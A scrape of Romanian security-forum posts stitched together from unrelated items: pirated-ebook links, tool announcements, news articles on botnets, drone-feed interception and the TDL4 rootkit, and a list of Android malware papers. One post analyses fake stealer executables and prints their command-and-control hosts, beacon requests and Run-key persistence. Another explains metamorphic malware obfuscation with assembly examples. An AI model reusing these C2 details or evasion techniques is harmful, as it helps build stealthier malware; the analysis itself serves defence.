Usr6

The book’s unique collection of puzzles is supplemented with carefully developed tutorials on algorithm design strategies and analysis techniques intended to walk the reader step-by-step through the various approaches to algorithmic problem solving. Mastery of these strategies–exhaustive search, backtracking, and divide-and-conquer, among others–will aid the reader in solving not only the puzzles contained in this book, but also others encountered in interviews, puzzle collections, and throughout everyday life. Each of the 150 puzzles contains hints and solutions, along with commentary on the puzzle’s origins and solution methods. The only book of its kind, Algorithmic Puzzles houses puzzles for all skill levels. Readers with only middle school mathematics will develop their algorithmic problem-solving skills through puzzles at the elementary level, while seasoned puzzle solvers will enjoy the challenge of thinking through more difficult puzzles. download:DepositFiles Sursa

Description: The GNU Debugger or GDB as it is popularly called is one of the most important tools in a binary analysis researcher's arsenal. Unfortunately, even though the official documentation is HUGE, it's quite difficult for beginners and even intermediate users to pick things up! The SecurityTube GNU Debugger Expert course and certification aims to help you get up and running with GDB. In course of these videos we will look at applying GDB on multiple architectures - 32, 64 and ARM. We will look at how to do runtime analysis, program disassembly, reverse engineering and a ton of other fun things! Part 1: Course Introduction And Lab Setup Part 2: What's Up With The Symbol Files? Part 3: Analyzing Symbols With Nm Part 4: System Call Tracing With Strace Part 5: Breakpoints, Examining Registers And Memory Part 6: Modifying Registers And Memory Part 7: Gdb Convenience Variables And Calling Routines Part 8: Cracking A Simple Binary With Debug Symbols Part 9: Disassembling And Cracking A Simple Binary Part 10: Conditional Breakpoints Using Variables And Registers Part 11: Setting Up Debian Armel In Qemu Part 12: Cracking A Simple Program On Arm Architectures Part 13: Iphone Application Reversing And Cracking With Gdb Part 14: Gdb On 64 Bit Systems adunate de pe securitytube.net, By Vivek-Ramachandran

starting with what memory forensics actually is, and the differences between memory and live forensics. He then went on to discuss Volatility, a framework for the extraction of digital artifacts from volatile memory (RAM) samples. Detailed information about Volatility covered the following areas: Overview Per-Process Analysis API hooking Misc. Process Data GUI Subsystem Registry in Memory Callbacks IRP Hooking Devices MBR & MFT http://fast.wistia.com/embed/iframe/927ezhtxwv Slides Sursa

link promotie: https://www.surdoc.com/sign-up/?promo=2013CES cod promotie: 2013CES Also, you'll get an option to renew for 3 more years at $20 a year! Sursa: https://www.facebook.com/MySurDoc

RDG Packer Detector es un detector de packers,Cryptors,Compiladores, Packers Scrambler,Joiners,Installers. +Windows 7 Compatible +Windows 8 Compatible +Deteccion 32/64 bits PE -Posee sistema de detección Rápida. -Posee sistema de detección Potente Analizando el archivo completo, permitiendo la muli-detección de packers en varios casos. -Permite crear signaturas tus propias signaturas de detección. -Posee Analizador Crypto-Grafico. -Permite calcular el checksum de un archivo. -Permite calcular el Entropy, informando si el programa analizado esta comprimido, encriptado o no. -Detector de OEP (Punto de entrada Original) de un programa. -Puedes Chequear y descargar signaturas.Así siempre tú RDG Packer Detector estará Actualizado. -Loader de Plug-ins.. -Convertidor de Signaturas. -Detector de Falseadores de Entry Point. -De-Binder un extractor de archivos adjuntos. -Sistema Heuristico Mejorado. Download: http://www.egrupos.net/grupo/rdgsoft/ficheros/16/verFichero/11/RDG%20Packer%20Detector%20v0.7.0%202013%20Vx-Edition.rar Semnaturi - 1 ian 2013: http://www.egrupos.net/grupo/rdgsoft/ficheros/16/verFichero/12/RDG%20Signaturas%20Actualizables%201Enero2013.rar Sursa: http://www.rdgsoft.8k.com/ *descrierea e in spaniola, dar cred ca se intelege si nu e nevoie de traducere, oricum pe scurt: detecteaza packerul/ cripterul/ compilatorul/ binderul/ installerul/ etc. folosit pentru fisierele executabile (P.E)

1. @b3st & bc-vnt & altii, ce va impiedica in acest moment sa analizati benevol fisierele si sa postati rezultatul ? daca ti se pare suspect un fisier il analizezi, postezi rezultatul si gata -nu ai nevoie de aprobarea speciala pentru a face acest lucru 2&3. osc, tf tu vrei Mod:)) La ce-ti foloseste sa dai numa close unui topic daca nu stergi si linkul infectat? deci trebuie sa ai si dreptul de a edita postul respectiv, daca tot ai prins un user ca a postat un fisier infectat, poti sa-l lasi asa fara ban? , deci trebuie sa ai si dreptul de a da ban

stai 2s sa fac o poza // File: wallhack.exe SHA-1: 5af2e195a4a5c87235dbb4ac960aa7144bffd220 info stealer. adresa control panel: http://torrentsmd.herobo.com/index.php "Create By : The Hacker2012 .. am lucrat ceva la el .. 90 % e fakt de mn !" nice work

vazut.Un tutorial ce merita urmarit chiar si de persoanele care nu sunt interesate in mod special de exploiting, pt cultura gerenala. scurt si la obiect. Good job. Felicitari! daca imi permiti o mica adaugire (tu stiu ca stii, ca "am furat" de la tine multe cunostinte in domeniu) tu ai facut jump to esp folosindu-te de shell32.dll, dupa cum ai spus si tu adresa respectiva difera de la windows la windows in functie de limba/service pack/etc in "real life" in cazul in care este posibil, se prefera alegerea jump-ului din librariile cu care vine software-ul pentru a evita incompatibilitatile pomenite mai sus // hai ma mortule misca

Orice român poate afla acum dac? are calit??ile necesare pentru a deveni spion ?i cum se poate angaja în cadrul Serviciului Român de Informa?ii(SRI). Pe pagina oficial? de web a SRI a fost publicat un test online, care cuprinde 15 pa?i ?i la sfâr?itul c?ruia prime?ti un r?spuns referitor la calit??ile pe care le ai. De asemenea, celor care corespund profilului, li se indic? modalit??ile prin care po?i fi angaja?i în SRI. sursa:jurnalul.ro test: Serviciul Român de Informa?ii - Verific?-?i aptitudinile

Cyber-security experts turned the tables on an alleged hacker by using his own malware to film him through his own laptop webcam. Specialists from Georgia's Computer Emergency Response Team (CERT-Georgia) tricked a man they claim has been targeting their networks by hiding the virus inside a file titled 'Georgian-Nato Agreement'. After the attacker stole that archive from an infected PC in their lab, they were able to seize control of his computer and capture video of him at work. 'Hacker': This is the picture of the alleged cyber-attacker captured by Georgian security experts after they took control of malware on their systems and infected his computer with it The team also claim to have found out his home city, internet service provider and email addresses, as well as information that links him to Russian security agencies and other hackers in Germany. CERT-Georgia's experts had been investigating a botnet which had infiltrated the computers of politicians, civil servants, banks and NGOs in Georgia, the U.S., Canada, Ukraine and several other countries. They found that the attackers had planted malicious links to install the malware on specific news-site webpages that would be of interest to the kinds of people they wanted to target. '[The] threat was highly encrypted and used contemporary stealthy techniques, so that none of security tools could identify it,' the team said in a 27-page report into their investigation. Once installed, the virus seized control of the targeted computer, rifling its hard drives to search for Word and .pdf documents containing sensitive words like 'USA', 'NATO', 'Russia' and 'CIA'. The malware also scanned the computer's local network for find other hosts to infect, took screenshots, and took control of embedded webcams and microphones on machines to eavesdrop on targets. The investigation found the infiltration began as early as March 2011, with the virus undergoing a series of modifications as hackers tried to stay one step ahead of whatever security measures were used against it. CERT-Georgia's experts found that whenever they were able to trace the botnet's command and control servers, to which files were being uploaded, the hackers would switch the destination country and IP address. To fight the infections, the team blocked these IP addresses as soon as they were detected then cooperated with anti-virus software companies and foreign intelligence agencies to develop countermeasures. But their masterstroke was to work out how to take control of the botnet themselves and infect one of the hackers with his own malware. They then recorded him as he worked. Espionage: This screengrab provided by CERT-Georgia shows the various keywords that the virus searched for in files on targeted machines Their report explained, in broken English: 'We have Infected our PC from Lab, then gave Cyber Attacker Fake ZIP Archive with his own virus inside and the name “Georgian-Nato Agreement”. 'Attacker Stole that archive and executed malicious files. 'As we had access to BOT Panel, we had maintained control over his PC. 'Then captured got video of him, personally. We have captured process of creating new malicious modules. 'We have obtained Russian Document, from e-mail, where he was giving someone instructions how to use this malicious software and how to infect targets. 'We have linked him with some of German and Russian hackers. 'Then we have obtained information about his destination city, Internet service provider, e-mail, and etc.' Russia has long been suspected as behind a string of cyber attacks on Georgian targets. There were crippling denial-of-service attacks on Georgian banks and government networks before the Russian military attacked in 2008, arstechnica reported. Now, with security experts able to turn the tables on hackers, it appears a new chapter in cyber-warfare has begun. WHAT IS A BOTNET? A botnet is a collection of internet-connected computers over which a hacker has seized control. Each compromised machine - known as a 'bot' - is created when a computer is infected with malicious software (malware) which allows the hacker to direct its activities remotely. These infections can be accomplished by luring users into making a drive-by download, exploiting web browser vulnerabilities, or by tricking the user into running a Trojan horse program, which may come from via email. This malware will typically install modules that allow the computer to be commanded and controlled by the botnet's operator. Depending on how it is written, a Trojan may then delete itself, or may remain present to update and maintain the modules. Sursa: http://www.dailymail.co.uk/sciencetech/article-2225743/Alleged-hacker-caught-camera-cyber-security-experts-infect-HIS-OWN-virus.html?ito=feeds-newsxml

we bring you a 24 hour spooktacular giveaway of CyberGhost VPN (69.99 USD value) to give you that invisible power and get you protected from cyber-thieves. CyberGhost Classic VPN 12 months prepaid Anonymize yourself with your own Virtual Private Network. Simple and secure. Sofort-Download 1 53,98 53,98 link: 24 hour exclusive CyberGhost VPN Spooktacular giveaway! | Software Deals - CNET Download.com ps: nu luati mai mult de 1 licenta, nu pot fi folosite 2 licente promotionale oferta este valabila azi 1 noiembrie 2012 // * Unlimited traffic volume included. Speed limited to a maximum of 512 kbit/s after 20 GB/month

Four years after discovering that militants were tapping into drone video feeds, the U.S. military still hasn’t secured the transmissions of more than half of its fleet of Predator and Reaper drones, Danger Room has learned. The majority of the aircraft still broadcast their classified video streams “in the clear” — without encryption. With a minimal amount of equipment and know-how, militants can see what America’s drones see. Unmanned aerial vehicles, or UAVs, have become the single most important weapon in America’s far-flung pursuit of violent extremists. Hundreds of American Predators and Reapers fly above Libya, Yemen, Somalia, Pakistan, and Afghanistan — watching suspected enemies, and striking them when necessary. Nearly 3,000 people have been killed in the decade-long drone campaign. “If somebody could obtain reliable access to real-time Predator or Reaper video — without attribution or alerting U.S. military — that would a tremendous intel coup,” says Micah Zenko, a fellow at the Council on Foreign Relations. “There is an insatiable demand from Predator and Reaper imagery in Afghanistan and elsewhere. Any reluctance to use those for spying or missile strikes places operations in Afghanistan, Pakistan, Yemen, and Somalia at some risk.” Military officials have known about — and mostly shrugged off — the vulnerability since the development of the Predator in the 1990s. But the problem drew increased attention in 2008, when drone video footage was found on the laptops of Shi’ite militants in Iraq, who were able to intercept the feed using a piece of $26 software. The Pentagon and the defense industry assured the public that they’d close the hole by retrofitting the robotic aircraft with new communications protocols and encrypted transceivers that would keep the video from being intercepted again. Four years into the effort, however, only “30 to 50 percent” of America’s Predators and Reapers are using fully encrypted transmissions, a source familiar with the retrofitting effort tells Danger Room. The total fleet won’t see its communications secured until 2014. This source and others who work closely with drone operations say that drones flying overseas are among the first to get the newly secured equipment. They also noted that they are unaware of any incidents of militants using America’s unmanned eyes in the sky to their advantage. “But I’m surprised I haven’t,” the source adds. “And that doesn’t mean it’s not happening.” This isn’t the only vulnerability in the drone fleet. In March of 2011, an unknown software glitch caused a Predator stationed at a U.S. base in Africa to start its engine without human direction. Last October, as Danger Room first reported, Air Force technicians discovered a virus infecting the drones’ remote cockpits in Las Vegas. It took weeks of sustained effort to clean up the machines. The aircraft, which rely on GPS to guide them through the air, can run into problems if GPS signals are jammed in a particular area — something that can be done with cheap, commercially available hardware. Iranian officials claimed they hacked the GPS control signal of an advanced drone, though it’s impossible to verify that lofty claim. No one who works with UAVs is questioning the fundamental integrity of the drone fleet at the moment; it would take an incredibly sophisticated hacker to commandeer a Predator, for example. Nor is anyone pretending that this premiere tool of the U.S.global counterterror campaign is flawless. Predators and the larger, better-armed Reapers transmit video and accept instructions in one of two ways. The first is via satellite, to remote pilots and sensor operators who are often on the other side of the planet; these satellite communications are encrypted, and are generally considered secure. The second is through a radio frequency signal called the Common Data Link, which is used to share the drone’s video feed with troops on the ground. The CDL’s carrier signal — its specific pattern of frequencies, in a given order and for a given length of time — tells both transmitter and receiver on how to function. The problem is that the Predators’ version of the CDL carrier signal (also known as a “waveform”) didn’t include an order to encrypt the signal. So neither the transmitter on the drone nor the receivers that troops used on the ground employed encryption, either. There were reasons for this. The original Predator, just 27 feet long, was little more than a scaled-up model plane with an 85-horsepower engine. It had a payload of just half a ton for all its fuel, cameras and radios. And encryption systems can be heavy. (Big crypto boxes are a major reason the Army’s futuristic universal radio ended up being too bulky for combat, for example.) With the early Predator models, the Air Force made the conscious decision to leave off the crypto. The flying branch was well aware of the risk. “Depending on the theater of operation and hostile electronic combat systems present, the threat to the UAVs could range from negligible with only a potential of signal intercept for detection purpose, to an active jamming effort made against an operating, unencrypted UAV,” the Air Force reported in 1996. ”The link characteristics of the baseline Predator system could be vulnerable to corruption of down links data or hostile data insertions.” The Predator models steadily grew in power and payload, and took a big leap in dimensions and capability with the 36-foot-long Reaper version introduced in 2007. The Reaper has a 950-horsepower engine and a nearly 4,000-pound payload — more than enough capacity for crypto-enabled systems which, like all electronics, had shrunk in size and weight. The problem was that, by then, the military had rushed to the battlefield hundreds of Remotely Operated Video Enhanced Receivers, or Rovers – rugged, laptop-sized receivers with screens for watching drone footage. And those early version of the Rovers were developed and distributed so fast, the military once again left the crypto off. “It could be both intercepted (e.g., hacked into) and jammed,” e-mails an Air Force officer with knowledge of the program. Which mean the Pentagon was stuck, for a time. The military couldn’t replace the old CDL waveform with something encryptable until the Rovers — and the radio transmitters aboard the Predators — could handle such a signal. Eventually, the Rovers began to be swapped out for newer models. The latest version, the “Tactical Rover,” (.pdf) is about the size of an old-school mobile phone. It can use both the Advanced Encryption Standard an the triple-Data Encryption Standard to secure video feeds. There are now about a thousand of the units in the military’s hands. And now, the Predators and Reapers are starting to get enhanced radios, too. “The fleet-wide upgrade begins later this year and carries on for several years,” says Maj. Mary Danner-Jones, an Air Force spokesperson. The service is spending $12 million on crypto-enabled Vortex transceivers (.pdf). That’s allowing a new, hardened waveform to be introduced throughout the Predator and Reaper fleet. The Air Force recently gave Predator-maker General Atomics Aeronautical Systems a $26 million contract to retrofit its drone cockpits to accept the carrier signal, among other enhancements. The question is why hasn’t this happened sooner. After all, the Navy installed multiple layers of encryption in their ’bots some time ago. Navy spokesman Jamie Cosgrove tells Danger Room that “the vast majority” of naval drones are encrypted – “and have been since development.” One source who works on developing Navy UAVs, but is not authorized the speak on the record, explains why: ”Standard unencrypted video is basically a broadcast to whoever can figure out the right carrier frequency, so essentially, we are simulcasting to battlefield commanders and the opposing force. If that opposing force knows we can see them and from where, they can take better evasive maneuvers.” It’s possible that none of the militants America is trying today are as sophisticated as the ones who intercepted that drone video in 2008. It’s possible that the value of such footage-from-above is so fleeting that extremists have never again bothered to grab it. But it’s worth noting that Predator and Reaper video is considered by the U.S. military to be classified information. And when U.S. commanders on the ground get into a firefight, the first call they usually make is for a drone, so they can take a look at the battlefield through the eyes of a drone. Sursa: http://www.wired.com/dangerroom/2012/10/hack-proof-drone/

toate la gramada File: Istealer 6.3.exe SHA-1: 9c80725239cdeab95e1654ea24326b679d049d14 Size: 1.72 MB (1,806,336 bytes) GET /A/O/?action=add... HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Host: caddyfkn.net63.net Connection: Keep-Alive HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Essentials c:\documents and settings\administrator\local settings\temp\javaw.exe MS Sound Drivers c:\documents and settings\administrator\local settings\temp\istealer 6.3.exe File: expressvpn-install_v3.091.exe SHA-1: 17d6d274ce596ee46c73ce7b95b6082ba28778d4 Size: 2.20 MB (2,310,144 bytes) GET /A/O/?action=add&a=... Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Host: caddyfkn.net63.net Connection: Keep-Alive HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Essentials c:\documents and settings\administrator\local settings\temp\javaw.exe File: hc stealer @Lurrdock.exe SHA-1: e9dad76752d373c80b07f8a43ac81675b3d73a5d Size: 1.72 MB (1,806,336 bytes) GET /A/O/?action=add... HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Host: caddyfkn.net63.net Connection: Keep-Alive HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Essentials c:\documents and settings\administrator\local settings\temp\javaw.exe File: Cryptex - Cracked by TopLeakers.exe SHA-1: 9737fc9d66c14a4d6ae0d34c7642eb0a68ea1b39 Size: 1.72 MB (1,806,336 bytes) GET /A/O/?action=... HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727) Host: caddyfkn.net63.net Connection: Keep-Alive HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Essentials c:\documents and settings\administrator\local settings\temp\javaw.exe MS Sound Drivers c:\documents and settings\administrator\local settings\temp\cryptex - cracked by topleakers.exe celelalte fisiere luate tot din posturile lui : https://rstcenter.com/forum/60985-express-vpn-witch-cd-key.rst https://rstcenter.com/forum/60983-hc-stealer-crypterx.rst

Hacker's Delight (2nd Edition) By Henry S. Warren 2012 | 512 Pages | ISBN: 0321842685 | EPUB | 45 MB In Hacker’s Delight, Second Edition, Hank Warren once again compiles an irresistible collection of programming hacks: timesaving techniques, algorithms, and tricks that help programmers build more elegant and efficient software, while also gaining deeper insights into their craft. Warren’s hacks are eminently practical, but they’re also intrinsically interesting, and sometimes unexpected, much like the solution to a great puzzle. They are, in a word, a delight to any programmer who is excited by the opportunity to improve. Extensive additions in this edition include A new chapter on cyclic redundancy checking (CRC), including routines for the commonly used CRC-32 code A new chapter on error correcting codes (ECC), including routines for the Hamming code More coverage of integer division by constants, including methods using only shifts and adds Computing remainders without computing a quotient More coverage of population count and counting leading zeros Array population count New algorithms for compress and expand An LRU algorithm Floating-point to/from integer conversions Approximate floating-point reciprocal square root routine A gallery of graphs of discrete functions Now with exercises and answers filepost Sursa: http://ebookee.org/Hacker-s-Delight-2nd-Edition-_2030561.html

de ce ar trebui sa aprind sforile? e mai simplu sa faci un ceas solar cu un bat de chibrit in mijloc si astepti sa treaca cele 45 min intre 2 scafarli de bete is 15 min, intre 2 sfori(dungi negre) 1ora

There are 3 major Metamorphic techniques that are used in most Metamorphic/Polymorphic engines. Dead Code Injection, Register Usage Exchange (Register Renaming), and Equivalent Code Substitution. I will explain each of these techniques and give a simple example. Dead Code Injection: This technique is used by placing do-nothing instructions before, after, or in between regular code instructions. It is also known as "Junk Code" or "Garbage Code". Most will use the XOR, JMP, or NOP instruction for dead code injection. This example will place dead code before the call to a WinExec function: xor ecx,ecx ;Zero out the contents of the ecx register mov eax,ecx ;Move ecx into eax. Eax is now zero push eax ;Regular instruction push 01008748 ;Regular instruction call WinExec ;Regular instruction As you can see, we used two dead instructions to get "push eax" instead of just using one "push eax" instruction. That extra code rearranges the opcodes within the file. Register Usage Exchange (Register Renaming): This technique is used by swapping registers and variables around within the file but still keeping the code functioning the same. The first set of instructions is the original code and the second is the renamed code: pop edx ;Regular instruction mov edi,004h ;Regular instruction mov esi,epb ;Regular instruction mov eax,000ch ;Regular instruction add edx,0088h ;Regular instruction mov ebx,[edx] ;Regular instruction mov [esi+eax*4+00001118],ebx ;Regular instruction pop eax ;Renamed instruction mov ebx,004h ;Renamed instruction mov edx,epb ;Renamed instruction mov edi,000ch ;Renamed instruction add eax,0088h ;Renamed instruction mov esi,[eax] ;Renamed instruction mov [edx+edi*4+00001118],esi ;Renamed instruction And here we just swapped the instructions for others while keeping the code running as normal. Equivalent Code Substitution: This technique allows you to replace instructions with its equivalent instruction or an equivalent block of instructions. No real need to explain most of these since they are self-explanatory. But here are a few examples non the less: mov eax,0 ;Is equivalent to xor eax,eax push eax ;Is equivalent to mov edx,eax pop edx lea eax, [eax+edx] ;Is equivalent to add eax,edx Sursa

«HomeBank» is free software. I's an easy personal finance software that will help you managing your personal accounting. It is designed to easy to use and be able to analyse your personal finances in detail using powerful filtering tools and graphs. «HomeBank» benefits from more than 17 years of user experience and feedback. It is available for ~50 languages on GNU/Linux, FreeBSD, Microsoft Windows, MacOSX, and Nokia N***. If you are looking for an easy way to manage your personal finance then «HomeBank» should be the software of choice. Take some time to try it out, you won't regret it. Windows, macOSX, maemo, ubuntu, debian, open suse, fedora, mandriva, gentoo linux, arch linux, mops linux, +source code Download: HomeBank download Home: HomeBank - Free, easy, personal accounting for everyone sursa: http://homebank.free.fr/index.php

Chengyu Cao, de la Universitatea din Connecticut, sper? ca în viitorul apropiat robo?ii inteligen?i s? lucreze cot la cot cu oamenii pentru a rezolva o gram? larg? de probleme, de la cele legate de ?tiin??, pân? la cele legate de monitorizarea habitatelor naturale. În prezent, profesorul de inginerie mecanic? lucreaz? la crearea unei noi genera?ii de ma?ini inteligente, dispozitive autonome capabile s? navigheze singure prin lumea noastr?. Astfel de ma?ini nu numai c? vor fi capabile s? circule dintr-un loc în altul f?r? ajutor, ci vor putea „gândi”, folosind inteligen?a artificial? pentru a dep??i anumite obstacole sau situa?ii din mediu (un copac, o cl?dire, o schimbarea nea?teptat? a vremii). „Multe dintre vehiculele autonome folosite ast?zi sunt pilotate cu ajutorul telecomandei ?i necesit? existen?a personalului de suport ?i a unor echipamente speciale. Cercetarea noastr? inten?ioneaz? s? dezvolte sisteme autonome de încredere, sigure ?i care s? se adapteze la o gam? larg? de situa?ii ?i medii”, a explicat cercet?torul. Echipa de cercetare dezvolt? ?i re?ele de senzori care s? le permit? ma?inilor s? navigheze f?r? ajutor uman. De asemenea, ei vor s? creeze un sistem complex de control care s? le permit? grupurilor de robo?i s? coopereze. Un exemplu ar fi un grup de patru elicoptere autonome care s? ridice ?i s? care un obiect mare f?r? a-l sc?pa ?i f?r? a gre?i direc?ia. Echipa de cercet?tori condus? de Cao a realizat un elicopter sofisticat, controlat prin telecomand?, care urmeaz? s? fie modificat pentru a fi utilizat cu scopul de a testa noul design al sistemului de control. De asemenea, speciali?tii au dezvoltat un prototip al unui submersibil, numit Proteus, pentru a testa sistemul în mediul acvatic. De curând, echipa condus? de Cao a primit un grant în valoare de 1,2 milioane de dolari pentru a dezvolta o re?ea robotizat? subacvatic? care s? poat? fi utilizat? în misiuni de descoperire ?i salvare. „Aceste vehicule folosesc sisteme de pozi?ionare global?, camere video, senzori de lumin? ?i altimetria cu laser pentru a naviga. În acest mod, sistemul le permite vehiculelor s? î?i aleag? singure traseul. Nu cred c? va mai dura mult pân? când oamenii se vor încrede în vehiculele care opereaz? f?r? ajutor uman”, a declarat pilotul Igor Parsadanov. sursa: http://www.descopera.ro/dnews/10181470-nu-este-film-sf-e-realitate-apar-dronele-inteligente-care-functioneaza-fara-ajutorul-oamenilor-video

One of the most difficult to remove e-threats in the world, the TDL4 rootkit, appears to be back with a blast. According to a news report from network monitoring specialist Damballa, the new variant has not been isolated yet in binary form, but rather had its presence revealed by the “network noise” between the compromised systems and their command & control centers. Named by some antivirus vendors the “indestructible botnet”, the TDL4 infrastructure employs a series of tricks such as the use of rootkits to conceal their presence on the machine and evade detection, as well as encrypted traffic and peer-to-peer communication with the botmaster. The new variant is apparently able to infect the Volume Boot Record (VBR) – a special area of the hard-disk drive that is relatively off-limits for consumer-grade antivirus solutions. This trick allows the rootkit to stay completely hidden and – even if found – to make disinfection nearly impossible. The response to this strain of malware appears to come from the enterprise environment, as business-grade devices come equipped with a special module, called the Trusted Platform Module (TPM). This piece of hardware stores the signatures of critical start-up components of the computer it is installed on and can detect changes at the lower levels of the system. “Following the success of TDL4, hackers have been able to use the rootkit to develop new variants that continue to go undetected by antivirus. The latest iteration, dubbed SST.c, infects the Volume Boot Record,” said Joseph Souren, Vice President of trusted computing company Wave Systems in a quote for Net Security. Even if TPM can collect data from the computer and correlate it with what happens across the network, TDL4 has traditionally been a complex threat aimed at regular computer users, not at enterprises. This multi-purpose family of malware has been used like an accomplice to shady business such as adware delivery, click fraud and massive botnet operations. It may look like the end-user will be exposed to this type of threat until the antivirus aligns its technology to scan and disinfect the VBR area as well. This is not exactly true: for years, attacks against BIOS chips have been possible, although they would be somewhat complex to successfully achieve. And yet, no such incidents have been recorded outside the laboratory premises, even if no antivirus scans the BIOS area for malicious code, nor would it be able to pluck out of the BIOS chip if found. This is mostly due to the fact that the malicious code is vulnerable until it gets executed on the host machine and can be easily intercepted by any decent antivirus solution with behavioral detection. sursa: http://www.hotforsecurity.com/blog/new-variant-of-tdl4-buries-itself-deep-into-the-hard-drive-to-evade-detection-3848.html

07_Reversing Android Malware.pdf ³ 1314775653_emilien.girault-at-sogeti.com_Forensic Challenge 2011 - Challenge 9 - v2.doc ³ 1_La_diffusione_di_Android_al_di_fuori_del_marcato_mobile.pdf ³ A Look Inside the Android Kernel.pdf ³ A Methodology for Empirical Analysis of Permission-Based Security Models and its Application to Android.pdf ³ A RECORD-BREAKING YEAR FOR MALWARE.pdf ³ A Study of Android Application Security.pdf ³ A Survey of Mobile Malware in the Wild.pdf ³ AISEC-TR-2012-001-Android-OS-Security.pdf ³ An Android Security Case Study with Bauhaus.pdf ³ Andbot Towards Advanced Mobile Botnets .pdf ³ Android Analysis Framework Dexter.pdf ³ Android Binder.pdf ³ Android Malware Forensics Reconstruction of Malicious Events.pdf ³ Android Reverse Engineering Tools.pdf ³ Android security model.pdf ³ Android Security.pdf ³ Android-Market-Threat-Analysis-6-22-10-v1.pdf ³ androidcours.pdf ³ Android_Security_Model.pdf ³ android_trojan_zitmo_final_pdf_17585.pdf ³ androsim-1.2.exe ³ AnserverBot_Analysis.pdf ³ Anti-Malware solutions for Android.pdf ³ Application Collusion Attack on the Permission-Based Security Model and its Implications for Modern smartphone Systems.pdf ³ Arthur_Donkers_en_Ralph_Moonen.pdf ³ Behavior abstraction in Malware analysis.pdf ³ BH_US_11_Daswani_Mobile_Malware_WP.pdf ³ BlackHat_DC_2011_Avraham-Popping_Android_Devices-Slides.pdf ³ Bypassing the Android Permission Model.ppt ³ CNCCS-Smartphone-Malware-Full-Report-Translated-06-7-11-FINAL.pdf ³ codegate2k10tora-100426060011-phpapp01.pdf ³ codeobfuscation-110909001233-phpapp01.pptx ³ COMPLETE-DroidDream-Technical-Tear-Down_Lookout-Mobile-Security.pdf ³ Cryptography for mobile malware obfuscation.pdf ³ Dan_Guido_Mike_Arpaia_Mobile_Exploit_Intelligence_Project.pdf ³ demystifying-android.pdf ³ Design of SMS Commanded-and-Controlled and P2P-Structured Mobile Botnets.pdf ³ Detecting Android Malware on Network Level.pdf ³ Detection of Malicious Applications on Android OS.pdf ³ Detection of Smartphone Malware.pdf ³ dissecting-andro-malware_33754.pdf ³ Documentation reverse-engineering avanc‚ DALVIK.pdf ³ Fuzzing the Phone in your Phone.pdf ³ Geinimi_Trojan_Teardown.pdf ³ GeorgiaW_Smartphone_Bots_SLIDES_Shmoocon2011.pdf ³ HackingyourDroid-Slides.pdf ³ History-of-Mobile-Malware.pdf ³ HPW2011 - Reversing Android Malware - Mahmud Ab Rahman.pdf ³ INSECURE-Mag-34.pdf ³ InsomniDroid CrackMe Spoiler Insomni'hack 2012.pdf ³ isec_android_exploratory_blackhat_2009.pdf ³ jnpr-2011-mobile-threats-report.pdf ³ linux_versus_android.pdf ³ lookout-mobile-threat-report-2011.pdf ³ Malicious Mobile Threats Report 2010-2011.pdf ³ Malware in iOS and Android... The gathering storm.pdf ³ Meyers - Reserve Engineers Mobile Apps.pdf ³ Mila Parkour-MOBILEMALWARE-20120619-3041.zip ³ Mobile Malware Analysis - Process Monitor Tool.pdf ³ Mobile Malware Evolution and the Android Security Model.pdf ³ MobileThreatReport_Q1_2012.pdf ³ Mobile_Threat_Report_Q4_2011.pdf ³ motivations_of_recent_android_malware.pdf ³ MyCERT-3-PST-HoneynetConf-Reversing Android Malware.pdf ³ NDSS_2012_Towards_Taming_Privilege-Escalation_Attacks_on_Android.pdf ³ Practice of Android Reverse Engineering.pdf ³ Presentation_DyAnA_SigInt2012_2012-05-20.pdf ³ Privilege Escalation Attacks on Android.pdf ³ Reducing the Window of Opportunity for Android Malware Gotta catch 'em all.pdf ³ Reverse Engineering of the Android File System.pdf ³ Reversing Android Apps.pdf ³ Reversing Android.pdf ³ ReversingAndroid.pdf ³ RFJ2009-NordSec.pdf ³ Rise of the iBots 0wning a telco network.pdf ³ Rooting Android - Extending the ADB by an Auto-Connecting WiFi-Accessible Service.pdf ³ rp-quarterly-threat-q1-2011.pdf ³ rpt_security_in_the_age_of_mobility.pdf ³ slides_Android_L3info.pdf ³ Smartphone Malware Evolution Revisited Android Next Target.pdf ³ SOCIAL NETWORKING FOR BOTNET.pdf ³ spsm11-burguera.pdf ³ sp_android-malware-sms-relay-tip-of-iceberg.pdf ³ SSTIC2011-Slides-Securite_Android-ruff.pdf ³ SteveFox_MobileBotnetTrends2011_v2 (1).pdf ³ summercon10-androidhax-jonoberheide.pdf ³ S‚curit‚ du SystŠme Android.pdf ³ taming_the_robot_droidcon11_talk.pdf ³ The Case for SE Android.pdf ³ The_Dalvik_Virtual_Machine.pdf ³ Understanding Android Security ³ Understanding Android Security.pdf ³ understandingandroidsecuritymodel-110304193331-phpapp01.pptx ³ when-android-apps-want-more-than-they-need.pdf ³ wp-android-malware-past-present-future.pdf ³ Yxes-Apvrille-EICAR2010.pdf ³ "Andromaly" a behavioral malware detection.pdf ³ ÀÄÄÄPrimer On AndroidOS Reversing ³ ARTeam.esfv ³ Read Me First.txt ³ Torrent downloaded from Demonoid.me.txt ³ ÃÄÄÄtools ³ ÃÄÄÄDecompiler ³ ³ baksmali.jar ³ ³ smali.jar ³ ³ ³ ÀÄÄÄSigning APKs ³ autosign.bat ³ setx.exe ³ testsign.jar ³ testsign_apk.reg ³ ÀÄÄÄTutorial FullTuT.htm FullTuT.swf FullTuT.txt Download: https://www.dropbox.com/sh/e2qo3ik9ubdz7h2/muZT8lC7gs Sursa: http://twitter.com/i7s3curi7y

